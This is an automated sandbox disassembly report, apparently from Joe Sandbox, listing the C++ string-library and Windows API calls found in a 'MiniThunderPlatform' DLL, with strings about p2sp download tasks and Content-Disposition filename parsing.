                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(00000040,00000000,00000001), ref: 100292F8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1002931A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 10029338
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$V12@$?assign@?$basic_string@$??1?$basic_string@$V12@@$??0?$basic_string@?find@?$basic_string@$V01@$??$?8?erase@?$basic_string@?rfind@?$basic_string@D@1@@std@@D@2@@0@H_prologV01@@V?$basic_string@
                                                                                                                                              • String ID: #$://
                                                                                                                                              • API String ID: 1144794548-4280483794
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100B5194
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100B51BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(main), ref: 100B5240
                                                                                                                                                • Part of subcall function 100AE270: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,00000000,1008E59F,?,000000FF,00000000), ref: 100AE281
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,000000FF,00000000), ref: 100B526D
                                                                                                                                                • Part of subcall function 100EA470: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(priority_ranges,0000007C,00000000,?,?,?,p2s_task_event_handler,?,?,?,?), ref: 100EA499
                                                                                                                                                • Part of subcall function 100EA470: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EA4BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B52BC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B52D0
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(000001D8), ref: 100B52E7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no_data_expiration_time), ref: 100B537D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp), ref: 100B5394
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B540F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B5421
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_p2p), ref: 100B547B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100B5492
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000001), ref: 100B54C8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B54DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_filesize), ref: 100B54F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100B550C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B557C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B558E
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100B5607
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,514A63AA,10241D09,000000FF,10023A01), ref: 1002778D
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002779E
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277AC
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277BA
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277C8
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277D9
                                                                                                                                                • Part of subcall function 10089D40: RtlEnterCriticalSection.NTDLL(?), ref: 10089D68
                                                                                                                                                • Part of subcall function 10089D40: RtlLeaveCriticalSection.NTDLL(?), ref: 10089D87
                                                                                                                                                • Part of subcall function 10089DA0: RtlEnterCriticalSection.NTDLL(?), ref: 10089DC8
                                                                                                                                                • Part of subcall function 10089DA0: RtlLeaveCriticalSection.NTDLL(?), ref: 10089DE7
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(member_stat_flag), ref: 100B57D0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(MemberStat), ref: 100B57E7
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 1007DE38
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007DE62
                                                                                                                                                • Part of subcall function 1007DDC0: RtlInitializeCriticalSection.NTDLL(00000184), ref: 1007DE7F
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?), ref: 1007DF39
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DF71
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DF8A
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DFA3
                                                                                                                                                • Part of subcall function 1007DDC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1007DFBC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B585B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B586D
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$CriticalSection$Initialize$EnterLeaveV01@@$CountH_prologIncrementInterlockedTickmalloc
                                                                                                                                              • String ID: MemberStat$enable_filesize$enable_p2p$main$member_stat_flag$no_data_expiration_time$p2s_task_event_handler$p2sp$p2sp_task
                                                                                                                                              • API String ID: 3320299575-963970474
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Disposition,00000000), ref: 10095089
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100950B5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(httpresponse_header don't have field: Content-Disposition,00000000), ref: 100950D7
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102BBD20), ref: 10095100
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000), ref: 10095110
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(filename=,00000000,00000009), ref: 10095140
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1009515B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,-00000009,?), ref: 10095180
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 100951AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?), ref: 100951C3
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000001), ref: 100951FA
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001), ref: 10095215
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?), ref: 1009523B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10095284
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095295
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?), ref: 100954AF
                                                                                                                                                • Part of subcall function 10093E70: ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(1027B92C,00000000,00000002,00000000,1009519E,?), ref: 10093E80
                                                                                                                                                • Part of subcall function 10093E70: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 10093E97
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,00000000,00000001,?), ref: 100952EF
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?), ref: 10095311
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009534B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009535C
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,?,?,?,?), ref: 100953D1
                                                                                                                                              • WideCharToMultiByte.KERNEL32 ref: 1009540A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000000), ref: 10095424
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(\/:*?"<>|,00000000,00000009,?,?,?,?), ref: 1009543A
                                                                                                                                              • ?_Xran@_String_base@std@@QBEXXZ.MSVCP71(?,?,?,?), ref: 10095462
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(\/:*?"<>|,00000000,00000009,?,?,?,?), ref: 1009548F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954CC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V12@$V01@@$?assign@?$basic_string@?erase@?$basic_string@?find@?$basic_string@$??$?8?find_first_of@?$basic_string@ByteCharD@1@@std@@MultiV01@V12@@V?$basic_string@Wide$??4?$basic_string@?find_first_not_of@?$basic_string@D@2@@0@D@2@@0@0@ExceptionString_base@std@@ThrowXran@_
                                                                                                                                              • String ID: ;$Content-Disposition$\/:*?"<>|$filename=$httpresponse_header don't have field: Content-Disposition
                                                                                                                                              • API String ID: 849614362-1980596132
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C9416
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9468
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C946F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9476
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C948A
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C949C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C94E9
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C94FE
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C956F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C95C2
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C95C9
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C95D0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C95E3
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C95F5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C962D
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C9642
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C9689
                                                                                                                                                • Part of subcall function 1000F180: _ui64toa.MSVCR71 ref: 1000F1AC
                                                                                                                                                • Part of subcall function 1000F180: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,100162D1,?,?,?,?,00000014,env), ref: 1000F1BC
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,00000000,?), ref: 100C971C
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C9723
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C972A
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A30
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A6A
                                                                                                                                                • Part of subcall function 100019A2: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP71(?,?,7C3CC1BB,?,10277CA8), ref: 10001A9A
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C9739
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C9755
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C976A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C977F
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C9791
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000002,00000000,?,?), ref: 100C97CA
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C97DF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??1?$basic_string@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@??6?$basic_ostream@?sputc@?$basic_streambuf@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@V01@V?$basic_string@$??0?$basic_string@$?clear@ios_base@std@@H_prologV01@@_ui64toa
                                                                                                                                              • String ID: no: $ range length: $ read notify failure, and file length unknown, exit$ read notify failure, and not support range, exit$ read notify failure, reopen range pos:
                                                                                                                                              • API String ID: 2205180056-194739534
                                                                                                                                              • Opcode ID: 06e8264eb31df044fae4eab9aba1831b8ff51da6a13d1074438867e2c9e8eb4f
                                                                                                                                              • Instruction ID: 0fffe3696d969b99f903fee756cdb99bbd2b6ed69ab5727694b2e0f5ca4631fe
                                                                                                                                              • Opcode Fuzzy Hash: 06e8264eb31df044fae4eab9aba1831b8ff51da6a13d1074438867e2c9e8eb4f
                                                                                                                                              • Instruction Fuzzy Hash: A2C15B342043809FD325DB64C899FDBBBE8EF99704F004A5DF59E97291DB706648CB62
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D109A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(7C3D2C5E,?,?), ref: 100D10BD
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D10CA
